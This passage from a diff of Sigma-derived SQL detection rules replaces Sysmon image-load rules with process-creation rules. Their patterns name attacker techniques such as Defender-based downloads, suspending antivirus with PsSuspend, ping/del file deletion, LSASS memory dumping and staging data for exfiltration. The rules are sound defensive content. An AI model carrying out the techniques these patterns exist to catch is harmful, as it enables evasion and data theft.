LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1562.001" ], "falsepositives": [ - "Rarely observed" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "status": "test", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "status": "experimental", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image 